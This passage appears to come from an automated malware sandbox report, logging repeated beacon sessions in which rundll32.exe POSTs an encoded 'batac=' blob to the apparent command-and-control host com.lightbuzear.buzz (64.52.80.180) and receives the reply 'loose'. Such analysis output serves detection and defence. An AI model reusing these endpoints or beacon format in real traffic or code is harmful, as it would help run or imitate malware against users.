              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:54 UTC136INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:54 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:54 UTC136INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              82192.168.2.224925464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:55 UTC136OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:55 UTC137OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:56 UTC138INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:55 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:56 UTC138INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              83192.168.2.224925564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:56 UTC138OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:56 UTC138OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:57 UTC139INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:56 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:57 UTC140INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              84192.168.2.224925664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:57 UTC140OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:57 UTC140OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:58 UTC141INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:57 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:58 UTC141INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              85192.168.2.224925764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:58 UTC141OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:58 UTC142OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:40:59 UTC143INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:40:59 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:40:59 UTC143INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              86192.168.2.224925864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:40:59 UTC143OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:40:59 UTC143OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:00 UTC144INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:00 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:00 UTC144INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              87192.168.2.224925964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:00 UTC144OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:00 UTC145OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:01 UTC146INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:01 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:01 UTC146INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              88192.168.2.224926064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:01 UTC146OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:01 UTC146OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:03 UTC148INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:03 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:03 UTC148INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              89192.168.2.224926164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:03 UTC148OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:03 UTC148OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:04 UTC149INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:04 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:04 UTC149INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.224918164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:35 UTC16OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:39:35 UTC16OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:39:35 UTC18INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:35 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:39:35 UTC18INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              90192.168.2.224926264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:05 UTC149OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:05 UTC150OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
              Data Ascii: batac=0L+XEVQMdNE0mdmOK4ptkgRxrWHl3PKwig9w4587/hMl/QbE7urWTjNRDNgEylKrg3y1YX4F/ZN6DYwSn/6HtUXJGg52WF//6mnyJVmx2DiI5x2tG4ADgpSlVHFAY0BOmbaa56+RpYTT9tZKOKXOeG5OnEihQ4v4SWj6aanNkEaHTvviUvcaL5NbjwedcAtPaIy33KpMmVoz25devpsg2lDPhJFkS9TDXtt2vti4BEWgj+XqsaWzMhC1Y
              2022-08-14 06:41:05 UTC151INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:41:05 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Access-Control-Allow-Origin: *
              Content-Length: 5
              Connection: close
              Content-Type: text/html; charset=UTF-8
              2022-08-14 06:41:05 UTC151INData Raw: 6c 6f 6f 73 65
              Data Ascii: loose


              Session IDSource IPSource PortDestination IPDestination PortProcess
              91192.168.2.224926364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:41:06 UTC151OUTPOST /Kolpt523ytcserstrew/torel HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: com.lightbuzear.buzz
              Content-Length: 1118
              Cache-Control: no-cache
              2022-08-14 06:41:06 UTC151OUTData Raw: 62 61 74 61 63 3d 30 4c 2b 58 45 56 51 4d 64 4e 45 30 6d 64 6d 4f 4b 34 70 74 6b 67 52 78 72 57 48 6c 33 50 4b 77 69 67 39 77 34 35 38 37 2f 68 4d 6c 2f 51 62 45 37 75 72 57 54 6a 4e 52 44 4e 67 45 79 6c 4b 72 67 33 79 31 59 58 34 46 2f 5a 4e 36 44 59 77 53 6e 2f 36 48 74 55 58 4a 47 67 35 32 57 46 2f 2f 36 6d 6e 79 4a 56 6d 78 32 44 69 49 35 78 32 74 47 34 41 44 67 70 53 6c 56 48 46 41 59 30 42 4f 6d 62 61 61 35 36 2b 52 70 59 54 54 39 74 5a 4b 4f 4b 58 4f 65 47 35 4f 6e 45 69 68 51 34 76 34 53 57 6a 36 61 61 6e 4e 6b 45 61 48 54 76 76 69 55 76 63 61 4c 35 4e 62 6a 77 65 64 63 41 74 50 61 49 79 33 33 4b 70 4d 6d 56 6f 7a 32 35 64 65 76 70 73 67 32 6c 44 50 68 4a 46 6b 53 39 54 44 58 74 74 32 76 74 69 34 42 45 57 67 6a 2b 58 71 73 61 57 7a 4d 68 43 31 59
